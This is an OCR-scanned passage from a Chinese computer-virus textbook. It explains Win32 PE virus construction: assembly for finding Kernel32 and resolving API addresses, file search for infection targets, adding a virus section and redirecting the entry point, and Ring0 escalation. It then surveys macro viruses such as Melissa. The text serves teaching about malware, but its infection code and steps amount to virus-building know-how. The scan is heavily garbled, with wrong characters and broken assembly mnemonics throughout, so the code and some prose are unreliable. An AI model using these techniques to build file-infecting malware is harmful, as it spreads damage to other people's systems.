Win32 PE 病毒 和 普通 Win32 PE 程序 一 样 需要 调用 API 呐 数 ,但 是 普通 的 Win32 PE 
程序 中 有 一 个 引入 函数 表 ,该 郴 数 表 对 应 了 代码 段 中 所 用 到 的 API 函数 在 动态 链接 库 中 的 
真实 地 址 。 这 样 ,调用 API 哨 数 时 就 可 以 通过 该 引入 表 找 到 相应 API 函数 的 真正 执行 地 
址 。 但 是 ,对 于 Win32 PE 病毒 来 说 , 它 只 有 一 个 代码 段 , 并 不 存在 引入 表 。 既 然 如 此 ,病毒 
就 无 法 像 普 通 程序 那样 直接 调用 相关 API 函数 ,而 应 该 先 找 出 这 些 API 明 数 在 相应 动态 链 
接 库 中 的 地 址 。 

如 何 获取 API 函数 地 址 一 直 是 病毒 技术 的 一 个 非常 重要 的 话题 。 要 获得 API 函数 地 
址 ,首先 需要 获得 相应 的 动态 链接 库 的 基地 址 。 在 实际 编写 病毒 的 过 程 中 ,经 党 用 到 的 动态 
链接 库 有 Kernel32. dll 和 user32. dll 等 。 具 体 需 要 搜索 哪个 链接 库 的 基地 址 ,就 要 看 病毒 
要 用 的 函数 在 哪个 库 中 了 。 不 失 一 般 性 ,以 获得 Kernel32 基地 址 为 例 ,介绍 几 种 方法 。 

(1) 利用 程序 的 返回 地 址 ,在 其 附近 搜索 Kernel32 的 基地 址 。 大 家 知道 , 当 系 统 打 开 
一 个 可 执行 文件 的 时 候 , 会 调用 Kernel32. dll 中 的 CreateProcess 图 数 。 当 CreateProcess 
图 数 在 完成 装载 工作 后 , 它 先 将 一 个 返回 地 址 压 人 到 堆栈 顶端 ,然后 转 回 执行 刚才 装载 的 应 
用 程序 。 当 该 应 用 程序 结束 后 ,会 将 堆栈 顶端 数据 弹出 放 到 (E)IP 中 ,并 且 继 续 执行 。 刚 才 
堆栈 顶端 保存 的 数据 是 什么 呢 ? 仔细 想 想 ,不 难 明 日 ,这 个 数据 其 实 就 是 CreateProcess 国 
数 在 Kernel32. dll 中 的 返回 地 址 。 其 实 这 个 过 程 和 call 指令 调用 子 程序 类 似 。 

可 以 看 出 ,这 个 返回 地 址 在 Kernel32. dll 模块 中 。 男 外 PE 文件 被 装 和 内存 时 是 按 内 
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存 页 对 齐 的 ,只 要 从 返回 地 址 按照 页 对 齐 的 边界 一 页 一 页 地 往 低地 址 搜索 ,就 必然 可 以 找到 
Kernel32. dll 的 文件 头 地 址 , 即 Kernel32 的 基地 址 。 其 搜索 代码 如 下 。 
mov ecx,[esp] // 将 堆栈 顶端 的 数据 ( 即 程 序 返回 Kerne132 的 地 址 ) 赋 给 ecx 
xor edx,edx // 清 零 
getK32Base: 
dec ecx // 逐 字 节 比较 验证 ,也 可 以 一 页 一 页 地 搜 
movedx, word ptr [ecx+ IMAGE DOS HEADER.e lfanew]  // 就 是 ecx+ 3ch 
testedx, 0f000h //Dos Header 和 stub 不 可 能 太 大 ,不 超过 4096 字 节 
jnz getK32Base // 加 速 检 验 
cmp ecx,dword ptr [ecx+ edx + IMAGE NT HEADERS. OptionalHeader. ImageBase] 
jnz getK32Base // 看 Image_Base 值 是 否 等 于 ecx( 模 块 起 始 值 ) 


mov [ebp + offset k32Base],ecx  // 如 果 是 ,就 认为 找到 Kernel32 的 Base 值 


也 可 以 采用 以 下 方法 。 


getKBase: 

mov edi, [esp + 04h] 

// 这 里 的 esp + 04h 是 不 定 的 ,主要 看 从 程序 第 一 条 指令 执行 到 这 里 有 多 少 push 
// 操 作 , 如 果 设 为 NH 个 push, 则 这 里 的 指令 就 是 Mov edi, [esp+Nx 4h] 

and edi, 0FFFF0000h 


. While TRUE 
. ifDWORD ptr [edi] == IMAGE DOS SIGNATURE // 判 断 是 否 为 MZ 
mov esi, edi 
add esi, DWORD ptr [esi + 03Ch] //esi 指向 PE 标志 
. if DWORD ptr [esi] == IMAGE NT SIGNATURE // 是 否 有 PE 标志 
. break // 如 果 有 ,跳出 循环 
. endif 
. endif 
sub edi, 010000h // 分 配 粒度 是 10000h, dll 必然 加 载 在 xxxx0000h 处 
. if edi < MIN KERNEL SEARCH BASE //MIN_KERNEL SEARCH BASE 等 于 70000000H 
mov edi, Obff70000h // 如 果 上 面 没 有 找到 , 则 使 用 Windows 9x 的 Kernel 地 址 
. break 
. endif 
. endw 
mov hKernel32, edi // 把 找到 的 Kerne132.dll 的 基地 址 保存 起 来 


(2) 对 相应 操作 系统 分 别 给 出 固定 的 Kernel32 模块 的 基地 址 。 对 于 不 同 的 Windows 
操作 系统 ,Kernel32 模块 的 地 址 是 固定 的 ,甚至 一 些 API 函数 的 大 概 位 置 都 是 固定 的 。 辟 
如 ,Windows 98 为 BFF70000,Windows 2000 为 77E80000,Windows XP 为 77E60000。 

在 得 到 了 Kernel32 的 模块 地 址 以 后 ,就 可 以 在 该 模块 中 搜索 所 需要 的 API 地 址 了 。 
对 于 给 定 的 API, 可 以 通过 直接 搜索 Kernel32. dll 导出 表 的 方法 来 获得 其 地 址 ,同样 也 可 以 
先 搜索 出 GetProcAddress 和 LoadLibrary 两 个 API 上 数 的 地 址 ,然后 利用 这 两 个 API 后 
数 得 到 所 需要 的 API 函数 地 址 。 在 已 知 API 函数 序列 号 或 函数 名 的 情况 下 ,如 何在 导出 表 
中 搜索 API 函数 地 址 的 过 程 请 读者 进一步 阅读 “PE 文件 结构 >”。 具 体 代 码 如 下 。 
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GetApiA proc Base: DWORD, sApi : DWORD 
local ADDRofFun : DWORD 
pushad 
mov edi, Base 
add edi, IMAGE DOS HEADER.e lfanew 
mov edi, [edi] // 现 在 edi = off PE HEADER 
add edi, Base // 得 到 IMAGE NT HEADERS 的 偏 移 
mOV ebx, edi 
mov edi, 
[edi + IMAGE NT HEADERS. OptionalHeader. DataDirectorV. VirtualRAddress ] 
add edi, Base // 得 到 edi = IMAGE EXPORT DIRECTORY 和 人口 
moV eax, [edi + lch] //Address0fFunctions 的 地 址 
add eax, Base 
mov ADDRofFun, eax 
//ecx = NumberOfNames 
moOV ecx, [edi + 18h] 
moOV edx, [edi + 24h] 
add edx, Base //edx = AddressOfNameOrdinals 
moOV edli, [edi + 20h] 
add edi, Base //edi = AddressOfNames 
invokeK32 api retrieve,Base, sApi 
mOV ebx, ADDRofFun 
shl eaxy 2 // 要 乘 以 4 才 得 到 偏 移 
add eax, ebx 
mOV eax, [ eax | 
add eax, Base // 加 上 Base 
mov [esp+7*4],eax //eax 返回 API 地 址 
popad 
ret 
GetApiA endp 
K32 api retrieve proc Base: DWORD , sApi :DWORD 
push edx // 保 存 edx 
xor eax, eax // 此 时 esi = sApi 
Next_ Api: //edi = AddressOfNames 
mOV esi, SAP1 
IO edx, edx 
dec edx 


Match Api name: 


moOV 


inc 


bl,byte ptr [esil] 
esil 
bl,0 


foundit 


edx 


70 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


push eax 
mov eax, [edi + eax * 4] //AddressOfNames 的 指针 ,递增 
add eax, Base // 注 意 是 RVA, 一 定 要 加 Base 值 
cmp bl,byte ptr [eax+ edx] // 逐 字符 比较 
pop eax 
jz Match Api name // 继 续 搜 寻 
inc eax /7 不 匹配 ,下 一 个 MPI 
loop Next Api 
Jmp no_ exist // 奇 全 部 搜 完 , 即 未 存在 
foundit: 
pop edx //edx = AddressOfNameOrdinals 
shl eax,1 // 乘 以 2 得 到 AddressOfNameOrdinals 的 指针 
movzx eax,word ptr [edx+ eax];  //eax 返回 指向 addressOfFunctions 的 指针 
ret 
no exist: 
pop edx 
xor eax, eax 
ret 
K32 api retrieve endp 
3. 文件 搜索 


搜索 文件 是 病毒 寻找 目标 文件 的 非常 重要 的 功能 。 在 Win32 汇编 中 ,通常 采用 API 郴 
数 进行 文件 搜索 。 关 键 的 图 数 和 数据 结构 如 下 。 

(1) FindFirstFile: 该 函数 根据 文件 名 查找 文件 。 

(2) FindNextFile: 该 函数 根据 调用 FindFirstFile 函数 时 指定 的 一 个 文件 名 查找 下 一 
个 文件 。 

(3) FindClose: 该 函数 用 来 关闭 由 FindFirstFile 函数 创建 的 一 个 搜索 句柄 。 

(4) WIN32_FIND_DATA: 该 结构 中 存放 着 找到 文件 的 详细 信息 。 

文件 搜索 一 般 采 用 递归 算法 进行 搜索 ,也 可 以 采用 非 递 归 搜 索 方 法 ,这 里 仅 介绍 递归 算 
法 的 搜索 过 程 。 


FindFile Proc 

(1) 指定 找到 的 目录 为 当前 工作 目录 

(2) 开始 搜索 文件 (* . x ) 

(3) 该 目录 搜索 完毕 ?是 则 返回 ,否则 继续 

(4) 找到 文件 还 是 目录 ?是 目录 则 调用 自 喘 函数 FindFile, 否则 继续 
(5) 是 文件 , 如 符合 感染 条 件 , 则 调用 感染 模块 ,否则 继续 

(6) 搜索 下 一 个 文件 (FindNextFile), 转 到 (3) 继 续 

FindFile Endp 


4. 内 存 映 射 文件 
内 存 映 射 文件 提供 了 一 组 独立 的 函数 ,这 些 函 数 使 应 用 程序 能 够 像 访 问 内 存 一 样 对 磁 
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盘 上 的 文件 进行 访问 。 这 组 内 存 映 射 文件 函数 将 磁盘 上 的 文件 全 部 或 者 部 分 映射 到 进程 虚 
拟 地 址 空间 的 某 个 位 置 ,以 后 对 文件 内 容 的 访问 就 如 同 在 该 地 址 区 域内 直接 对 内 存 访问 
一 样 简 单 。 这 样 , 对 文件 中 数据 的 操作 便 是 直接 对 内 存 进行 操作 ,大 大 提高 了 访问 的 速 
度 , 这 对 于 计算 机 病毒 减少 资源 占有 是 非常 重要 的 。 在 计算 机 病毒 中 ,通常 采用 如 下 几 
个 步骤 。 

(1) 调用 CreateFile 函数 打开 想 要 映射 的 答 主 程序 ,返回 文件 句柄 hFile。 

(2) 调用 CreateFileMapping 函数 生成 一 个 建立 基于 宿主 文件 句柄 hFile 的 内 存 映射 对 
象 ,返回 内 存 映射 对 象 句柄 hMap。 

(3) 调用 MapViewOfFile 函数 将 整个 文件 (一 般 还 要 加 上 病毒 体 的 大 小 ) 映 射 到 内 存 
中 。 得 到 指向 映射 到 内 存 的 第 一 个 字 节 的 指针 (pMem)。 

(4) 用 刚才 得 到 的 指针 pMem 对 整个 宿主 文件 进行 操作 ,对 宿主 程序 进行 病毒 感染 。 

(5) 调用 UnmapViewFile 函数 解除 文件 映射 ,传人 参数 是 pMem.。 

(6) 调用 CloseHandle 困 数 来 关闭 内 存 映 射 文件 ,传人 参数 是 hMap。 

(7) 调用 CloseHandle 函数 来 关闭 宿主 文件 ,传人 参数 是 hFile。 

5. 病毒 如 何 感染 其 他 文件 

PE 病毒 感染 其 他 文件 的 常见 方法 是 在 文件 中 添加 一 个 新 的 节 , 然 后 把 病毒 代码 和 病 
毒 执行 后 返回 和 宿主 程序 的 代码 写 和 人 新 添加 的 节 中 ,同时 修改 PE 文件 头 中 入 口 点 
(AddressOfEntryPoint) ,使 其 指 癌 新 添加 的 病毒 代码 入 口 。 这 样 , 当 程序 运行 时 ,首先 执行 
病毒 代码 , 当 病 毒 代 码 执 行 完 成 后 才 转 回执 行 宿主 程序 。 下 面具 体 分 析 病 毒 感染 其 他 文件 
的 步骤 。 

(1) 判断 目标 文件 开始 的 两 个 字 节 是 否 为 MZ。 

(2) 判断 PE 文件 标记 PE。 

(3) 判断 感染 标记 ,如 果 已 被 感染 过 则 跳出 ,继续 执行 宿主 程序 ,否则 继续 。 

(4) 获得 Data Directory( 数 据 目 录 ) 的 个 数 (每 个 数据 目录 信息 占 8 字 节 )。 

(5) 得 到 节 表 起 始 位置 ( 数 据 目 录 的 偏 移 地 址 十 数据 目录 占用 的 字 节 数 王 节 表 起 始 
位 置 ) 。 

(6) 得 到 节 表 的 末尾 偏 移 ( 紧 接 其 后 用 于 写 人 一 个 新 的 病毒 节 信 息 , 节 表 起 始 位 置 十 节 
的 个 数 X 每 个 节 表 占用 的 字 节 数 28H 三 节 表 的 末尾 偶 移 ) 。 

(7) 开始 写 入 节 表 。 

Qz 写 入 节 名 (8 字 节 )。 

GO 写 入 节 的 实际 字 节 数 (4 字 节 )。 

G) 写 入 新 节 在 内 存 中 的 开始 偏 移 地 址 (4 字 节 ), 同 时 可 以 计算 出 病毒 人口 位 置 。 上 一 
个 节 在 内 存 中 的 开始 偏 移 地 址 十 (上 一 个 节 的 大 小 / 节 对 齐 十 1) XX 节 对 齐 = 二 本 节 在 内 存 中 的 
开始 偏 移 地 址 。 

@ 写 人 本 节 ( 即 病毒 节 ) 在 文件 中 对 齐 后 的 大 小 。 

@ 写 入 本 节 在 文件 中 的 开始 位 置 。 上 节 在 文件 中 的 开始 位 置 十 上 节 对 齐 后 的 大 小 = 
本 节 ( 即 病毒 ) 在 文件 中 的 开始 位 置 。 

@ 修改 映像 文件 头 中 的 节 表 数目 。 

G@) 修改 AddressOfEntryPoint ( 即 程序 入 口 点 指 问 病毒 入 口 位 置 ), 同 时 保存 旧 的 
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AddressOfEntryPoint,; 以 便 返 回答 主 并 继续 执行 。 

更 新 SizeOfImage( 内 存 中 整个 PE 映像 尺寸 = 原 SizeOfImage 十 病毒 节 经 过 内 存 节 
对 齐 后 的 大 小 ) 。 

@ 写 入 感染 标记 (后 面 例 子 中 是 放 在 PE 头 中 ) 。 

(8) 在 新 添加 的 节 中 写 人 病毒 代码 。 

ECX = 病毒 长 度 


ESI = 病毒 代码 位 置 (并 不 一 定 等 于 病毒 执行 代码 开始 位 置 ) 
EDI = 病毒 节 写 人 位 置 


(9) 将 当前 文件 位 置 设 为 文件 末尾 。 
6. 如 何 返 回 到 宿主 程序 


为 了 提高 自己 的 生存 能 力 ,病毒 不 应 该 破坏 宿主 程序 的 原 有 功能 。 因 此 ,病毒 应 该 在 执 
行 完毕 后 ,立刻 将 控制 权 交 给 宿主 程序 。 病 毒 如 何 做 到 这 一 点 呢 ? 返回 笨 主 程序 相对 来 
说 比较 简单 ,病毒 在 修改 被 感染 文件 代码 开始 执行 位 置 (AddressOfEntryPoint) 时 ,会 保存 
原来 的 值 ,这 样 ,病毒 在 执行 完 病毒 代码 之 后 用 一 个 跳 转 语句 跳 到 这 段 代 码 处 继续 执行 
印 可 。 

在 这 里 ,病毒 会 先 作 出 一 个 “现在 执行 程序 是 否 为 病毒 启动 程序 ”的 判断 ,如 果 不 是 启动 
程序 ,病毒 才 会 返回 宿主 程序 ,否则 继续 执行 程序 其 他 部 分 。 对 于 启动 程序 来 说 , 它 是 没有 
病毒 标志 的 。 

上 述 几 点 都 是 病毒 编制 不 可 缺少 的 技术 ,这 里 的 介绍 比较 简单 ,如 果 想 进一步 了 解 
病毒 编制 技术 可 以 参考 Billy Belceb 的 Win32 病毒 编制 技术 以 及 中 国 病 毒 公 社 (CVC) 


3.3.3 从 Ring3 到 Ring0 的 简 述 


Windows 操作 系统 运行 在 保护 模式 ,保护 模式 将 指令 执行 分 为 4 个 特权 级 , 即 众 所 周 
知 的 Ring0、Ringl、Ring2 和 Ring3。Ring0 意味 着 更 多 的 权利 ,可 以 直接 执行 诸如 访问 端 
口 等 操作 ,通常 应 用 程序 运行 于 Ring3 ,这 样 可 以 很 好 地 保护 系统 安全 。 然 而 当 需 要 Ring0 
的 时 候 ( 如 跟踪 、 反 跟踪 和 写 病毒 等 ) ,麻烦 就 来 了 。 如 果 想 进入 Ring0 ,一 般 要 写 VxD 或 
WDM 驱动 程序 ,但 这 项 技术 对 一 般 人 来 说 并 不 那么 简单 。 由 于 Windows 9x 未 对 IDT 
(Interrupt Descriptor Table) .GDT (Global Descriptor Table) 和 LDT (Locale Descriptor 
Table) 加 以 保护 ,可 以 利用 这 一 漏洞 进入 Ring0。 用 SHE(Structure Handle Exception)、 
IDT、GDT 和 LDT 等 方法 进入 Ring0 的 例子 请 参考 CVC 杂志 .已 公开 的 病毒 源码 和 相关 
论坛 等 。 

在 Windows NT/Windows 2000/Windows XP 下 进入 Ring0 是 一 件 较 困难 的 事情 , 因 
此 ,大 多 数 感染 Windows NT/Windows 2000/Windows XP 系统 的 病毒 都 是 Ring3 级 别 的 。 

由 于 Windows 2000 有 比较 多 的 安全 审核 机 制 ,在 Windows 2000 下 进入 Ring0 还 必须 
具有 Administrator 权限 。 如 果 系 统 存 在 某 种 漏洞 ,如 缓冲 区 海 出 等 ,还 是 有 可 能 获得 
Administrator 权限 的 。 因 此 ,必须 同时 具备 病毒 编制 技术 和 黑客 技术 才能 进入 Windows 
2000 的 Ring0 ,由 此 可 以 看 出 ,病毒 编制 技术 越 来 越 需要 综合 能 力 。 
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3.3.4 PE 文件 格式 实验 


本 实验 是 根据 PE 文件 结构 及 其 运行 原理 而 设计 的 实验 。 通 过 该 实验 ,读者 可 以 了 解 
PE 文件 的 结构 ,为 进一步 学 习 PE 文件 病毒 原理 奠定 基础 。 

【实验 目的 】 

了 解 PE 文件 的 基本 结构 。 

【实验 环境 】 

(1) Windows 2000、Windows 9x、Windows NT 以 及 Windows XP。 

(2) Visual Studio 6. 0 。 

【实验 步骤 】 

文件 位 置 : 本 书 配套 素材 日 录 \Experiment\winpe。 

使 用 编译 环境 打开 源 代码 工程 ,编译 后 可 以 生成 可 执行 文件 winpe. exe。 

预备 步骤 : 找 任意 一 个 Win32 下 的 EXE 文件 作为 查看 对 象 。 

实验 内 容 : 运行 winpe. exe, 并 打开 任 一 exe 文件 ,选择 不 同 的 菜单 ,可 以 查看 到 exe 文 
件 的 内 部 结构 。 实 验 具 体 步 又 可 以 参考 本 书 PPT。 可 以 与 网 上 同类 共享 软件 比较 ,例如 ， 
PE_STUB. exe 等 PE 文件 查看 需 软 件 。 


3.4 安 病 毒 


在 恶意 代码 出 现 的 早期 , 反 病毒 研究 者 就 在 讨论 宏 病 毒 了 了。20 世纪 80 年 代 , 两 位 出 色 
的 研究 者 Fred Cohen 博士 和 Ralf Burger 对 此 进行 了 讨论 ,1989 年 Harold Highland 曾经 
对 此 写 过 一 篇 关于 安全 方面 的 文章 A Macro Virus 。 反 病毒 界 知道 了 实现 宏 病 毒 的 可 能 
性 ,并 且 为 它们 没有 在 Lotus 1-2-3 和 WordPerfect 中 出 现 而 感到 困惑 。 或 许 病毒 制造 者 正 
在 等 待 合适 的 程序 出 现 。 这 个 合适 的 程序 就 是 Microsoft Word。 第 一 个 微软 Office 宏 病 毒 
于 1994 年 12 月 发 布 。 到 1995 年 Office 宏 病 毒 就 已 经 感染 了 世界 上 几乎 所 有 的 Windows 
计算 机 。 曾 几何 时 , 宏 病 毒 让 其 他 类 型 的 恶意 代码 都 黯然 失色 。 


3.4.1 宏 病 毒 的 运行 环境 


宏 病 毒 与 普通 病毒 不 同 , 它 不 感染 EXE 文件 和 COM 文件 ,也 不 需要 通过 引导 区 传播 ， 
而 只 感染 文档 文件 。 制 造 宏 病 毒 并 不 费事 , 宏 病 毒 作 者 只 需要 懂得 一 种 宏 语言 ,并 且 可 以 用 
它 来 操纵 目 己 和 其 他 文件 ,保证 能 够 按照 预先 定义 好 的 事件 执行 即 可 。 安 病毒 的 产生 ,是 利 
用 了 一 些 数据 处 理 系 统 ( 如 Microsoft Word 文字 处 理 、Microsoft Excel 表格 处 理 系 统 ) 内 置 
宏 命 令 编 程 语 言 的 特性 而 形成 的 。 要 达到 安 病 毒 传 染 的 目的 , 须 具 备 以 下 特性 。 

(1) 可 以 把 特定 的 宏 命 令 代 码 附 加 在 指定 文件 上 。 

(2) 可 以 实现 宏 命 令 在 不 同文 件 之 间 的 共享 和 传递 。 

(3) 可 以 在 未 经 使 用 者 许可 的 情况 下 获取 某 种 控制 权 。 

目前 ,符合 上 述 条 件 的 系统 有 很 多 ,其 中 包括 Microsoft 公司 的 Word、Excel、Access、 
PowerPoint、Project、Visio 等 产品 ,Inprise 公司 的 Lotus AmiPro 文字 处 理 软件 。 此 外 ,还 
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包括 AutoCAD CorelDRAW PDF 等 。 这 些 系统 内 置 了 一 种 类 似 于 Basic 语言 的 宏 编 程 请 
言 ( 如 BASIC、Visual Basic 及 VBA 等 )。 

所 谓 宏 ,就 是 一 些 命令 组 织 在 一 起 ,作为 一 个 单独 单元 完成 一 个 特定 任务 。Microsoft 
Word 中 将 宏 定 义 为 :“ 宏 就 是 能 组 织 到 一 起 作为 独立 命令 使 用 的 一 系列 Word 命令 , 它 能 
使 日 常 工作 变 得 更 容易 。”Word 使 用 宏 语 言 BASIC 将 宏 作 为 一 系列 指令 来 编写 。 要 想 搞 
清楚 宏 病 毒 的 来 龙 去 脉 ,必须 了 解 Word 宏 的 基本 知识 及 其 编程 技术 。 

宏 语 言 是 一 种 编程 语言 ,但 是 有 其 日 己 的 弱点 。 首 先 , 宏 语言 不 能 脱离 母 程 序 运行 。 这 
就 导致 了 第 二 个 罚 点 , 宏 语 言 是 解释 型 的 ,而 不 是 编译 型 的 。 每 一 个 宏 命 令 要 在 其 运行 时 骸 
入 到 相应 的 位 置 , 这 种 解释 非常 耗费 时 间 。Office 新 的 宏 语言 实际 上 是 部 分 编译 成 中 间 代 
码 ,成 为 p 代码 。 但 是 p 代码 仍然 需要 解释 执行 。 

Word 宏 病 毒 是 一 些 制作 病毒 的 专业 人 员 利 用 Microsoft Word 的 开放 性 专门 制作 的 一 
个 或 多 个 具有 病毒 特点 的 宏 的 集合 ,这 种 病毒 宏 的 集合 影响 到 计算 机 的 使 用 ,并 能 通过 
DOC 文档 及 DOT 模板 进行 自我 复制 及 传播 。 

尽管 宏 病 毒 可 以 在 任何 一 个 功能 丰富 的 宏 语 言 应 用 程序 下 创建 ,但 它 多 数 还 是 在 微软 
Office 程序 下 运行 的 。 根 据 InfoWorld 杂志 的 说 法 ,世界 上 有 超过 9000 万 的 微软 Office 用 
户 , 因 此 ,多 数 宏 病毒 是 为 Word 和 Excel 设计 的 。 


3.4.2 宏 病 毒 的 特点 


与 传统 的 病毒 不 同 , 宏 病毒 具有 自己 的 特别 之 处 ,概括 起 来 包括 如 下 几 种 。 

1. 传播 极 快 

Word 宏 病毒 通过 DOC 文档 及 DOT 模板 进行 自我 复制 及 传播 ,而 DOC 文档 是 交流 最 
广 的 文件 类 型 。 多 年 来 ,人 们 大 多 重视 保护 自己 计算 机 的 引导 部 分 和 可 执行 文件 不 被 病毒 
感染 ,而 对 外 来 的 文档 文件 基本 是 直接 浏览 使 用 ,这 给 Word 宏 病 毒 传播 带 来 极 大 的 便利 。 
特别 是 Internet 网 络 的 普及 ,E-mail 的 大 量 应 用 更 为 Word 宏 病毒 传播 铺 平 道路 。 

2. 制作 方便 ,变种 多 

Word 使 用 宏 语 言 BASIC 来 编写 宏 指 令 。 宏 病毒 同样 用 BASIC 来 编写 。 目 前 ,世界 上 
的 宏 病 毒 原型 已 有 几 十 种 ,其 变种 与 日 俱 增 , 追 究 其 原因 还 是 Word 的 开放 性 所 致 。 现 在 的 
Word 病毒 都 是 用 BASIC 语言 写成 的 ,大 部 分 Word 病毒 宏 并 没有 使 用 Word 提供 的 
Execute Only 处 理 函 数 处 理 ,而 是 仍 处 于 可 打开 阅读 修改 状态 。 

所 有 用 户 能 够 很 方便 地 在 Word 工具 的 宏 莱 单 中 看 到 这 种 宏 病 毒 的 全 部 面目 。 当 然 会 
有 “不 法 之 徒 ? 利 用 掌握 的 BASIC 语句 把 其 中 病毒 激活 条 件 和 破坏 条 件 加 以 改变 ,立即 就 生 
产 出 了 一 种 新 的 宏 病毒 ,甚至 比 原 病 毒 的 危害 更 加 严重 。 

3. 破坏 可 能 性 极 大 

宏 病 毒 用 VBA( 早 期 使 用 BASIC) 语 言 编写 ,而 VBA 或 BASIC 语言 提供 了 许多 系统 级 
底层 调用 。 如 直接 使 用 DOS 系统 命令 ,调用 Windows VBA 或 API, 以 及 DDE、DLL 等 。 
这 些 操作 均 可 能 对 系统 直接 构成 威胁 ,而 Word 在 指令 安全 性 、 完 整 性 上 检测 能 力 很 弱 , 破 
坏 系 统 的 指令 很 容易 被 执行 。Word 宏 病 毒 的 破坏 体现 在 两 方面 。 

(1) 对 Word 运行 的 破坏 。 不 能 正常 打印 .关闭 或 改变 文件 存储 路 径 .将 文件 改名 、 乱 
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复制 文件 .封闭 有 关 菜 单 以 及 使 文件 无 法 正常 编辑 。 如 Taiwan No. 1 病毒 每 月 13 日 发 作 ， 
发 作 时 所 有 编写 工作 无 法 进行 。 

(2) 对 系统 的 破坏 。BASIC 语言 能 够 调用 系统 命令 ,造成 破坏 。 宏 病毒 Nuclear 就 是 
破坏 操作 系统 的 典型 之 一 。 

4. 多 平台 交叉 感染 

宏 病 毒 冲破 了 以 往 病 毒 在 单一 平台 上 传播 的 局 限 , 当 Word 和 Excel 这 类 著名 应 用 软 
件 在 不 同 平台 (如 Windows 9x、Windows NT、OS/2 和 MAC 等 ) 上 运行 时 ,会 引起 宏 病 毒 
的 交叉 感染 。 

5. 地 域 性 问题 

早期 的 绝 大 多 数 宏 病毒 只 感染 英文 版 Word 系统 ,通常 不 会 感染 其 他 一 些 本 地 化 的 非 
英文 版 本 的 Word 系统 ,如 法 文 版 或 德 文 版 Word 系统 。 当 然 相 反 的 情况 也 同样 存在 ,这 
是 因为 其 内 置 的 BASIC 是 不 同 版 本 的 缘故 。 巾 于 中 文 版 Word 内 置 的 BASIC 实际 上 是 
英文 版 的 ,因此 ,所 有 感染 英文 版 Word 的 宏 病 毒 几乎 都 会 对 中 文 版 Word 产生 威胁 。 

6. 版 本 问题 

宏 病 毒 在 DOC 文档 .DOT 模板 中 以 BFF(Binary File Format) 格 式 存 放 , 这 是 一 种 加 
密 压 缩 格式 ,不 同 的 Word 版 本 格式 可 能 不 兼容 。 


3.4.3 经 典 宏 病毒 


1. 美丽 水 (Melissa) 

1999 年 3 月 26 日 ,星期 五 ,上 午 8 点 30 分 。 著 名 反 病 毒 公司 NAI 的 专家 所 罗 门 博士 
(Solomons) 在 一 个 着 名 的 “性 讨论 新 闻 组 ”里 发 现 了 一 个 极 不 寻常 的 帖子 ,并 在 其 文档 中 发 
现 了 编写 精致 的 宏 病 毒 。 

这 个 病毒 专门 针对 微软 的 电子 邮件 服务 器 MS Exchange 和 电子 邮件 收发 软件 Outlook 
Express, 是 一 种 Word 宏 病 毒 ,利用 微软 的 Word 宏和 Outlook Express 发 送 载 有 80 个 色 
情 文 学 网 址 的 列表 , 它 可 感染 Word 97 或 Word 2000。 当 用 户 打 开 一 个 受到 感染 的 Word 
97 或 Word 2000 文件 时 ,病毒 会 自动 通过 被 感染 者 的 MS Exchange 和 Outlook Express 的 
通讯 录 , 给 前 50 个 地 址 发 出 带 有 W97M_MELISSA 病毒 的 电子 邮件 。 

如 果 某 个 用 户 的 电子 信箱 感染 了 “美丽 莎 ” 病 毒 ,那么 ,在 他 的 信箱 中 将 可 以 看 到 标题 为 
“Important message from XX( 来 日 XX 的 重要 信息 )” 的 邮件 ,其 中 XX 是 发 件 人 的 名 字 。 
正文 中 写 道 ,这 是 你 所 要 的 文件 …… 不 要 给 其 他 人 看 。 ?此 外 ,该 邮件 还 包括 一 个 名 为 list. doc 
的 Word 文档 附件 ,其 中 包含 大 量 的 色情 网 址 。 

由 于 每 个 用 户 的 邮件 目录 中 大 都 留 有 部 分 经 党 通信 的 朋友 或 客户 的 地 址 “美丽 莎 ? 病 
毒 便 能 够 以 几何 级 数 向 外 传播 ,直至 “淹没 ”电子 邮件 服务 器 ,使 大 量 电 子 邮件 服务 带 竣 痪 。 
据 计算 ,如果 “ 美 丽 莎 ”能 够 按照 理论 上 的 速度 传播 ,只 需要 繁殖 5 次 就 可 以 让 全 世界 所 有 的 
网 络 用 户 都 收 到 一 份 病毒 邮件 。 由 于 病毒 自动 地 进行 日 我 复制 ,因而 属于 蠕虫 类 病毒 。“ 美 
丽水 ”的 作者 显然 对 此 顾 为 得 意 ,他 在 病毒 代码 中 写 道 :“ 蠕 虫 类 ? 宏 病 毒 ? Word 97 病毒 ? 
还 是 Word 2000 病毒 ? 你 们 日 己 看 看 办 吧 1” 

“美丽 水 ?最 令 人 恐怖 之 处 ,不 在 于 “次 痪 ?邮件 服务 希 , 而 是 大 量 涉及 企业 .政府 和 和 军队 
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的 核心 机 密 有 可 能 通过 电子 邮件 的 反复 传递 而 扩散 出 去 ,甚至 受 损害 的 用 户 连 机 密 被 扩散 
到 了 哪里 都 不 知道 。 由 此 看 来 , “美丽 莎 ” 较 1988 年 谈 之 色 变 的 “英里 斯 蠕虫 病毒 ?和 1998 
年 的 “BO 黑客 程序 ?更 加 险恶 。 

2. 台湾 NO. 1B 


从 1995 年 发 现 了 全 世界 第 一 个 宏 病 毒 后 ,1996 年 在 我 国 台湾 也 已 诞生 了 第 一 个 本 土 
中 文化 的 “十 三 号 台湾 NO. 1B 宏 病毒 ”。 这 个 病毒 以 “何谓 宏 病 毒 , 如 何 预防 ?” 之 类 的 标 
题 , 随 着 Internet 与 BBS 网 络 流 传 ,将 会 对 不 知情 而 打开 观看 的 Word 使 用 者 造成 很 大 的 不 
便 。 除 了 一 般 的 计算 机 经 销 商 在 13 日 当天 传 出 灾情 ,导致 Word 无 法 使 用 外 , 硅 干 学 校 也 
发 现 此 病毒 的 踪迹 。 在 不 是 13 日 的 日 子 里 , 宏 病 毒 只 会 默默 地 进行 感染 的 工作 。 而 一 旦 到 
了 每 月 13 日 ,只 要 用 户 随 便 开启 一 份 文件 来 看 ,病毒 就 马上 发 作 。 

病毒 发 作 时 ,只 要 打开 一 个 Word 文档 ,就 会 被 要 求 计算 一 道 5 个 至 多 4 位 数 的 连 乘 算 
式 。 由 于 算式 的 复杂 度 ,很 难 在 短 时 间 内 计算 出 答案 ,一旦 计算 错误 , Word 就 会 上 月 动 开局 
20 个 新 窗口 ,然后 再 次 生成 一 道 类 似 的 算式 ,接着 不 断 往复 ,直至 系统 资源 耗 尺 。 

3. 097M. Tristate. C 病毒 

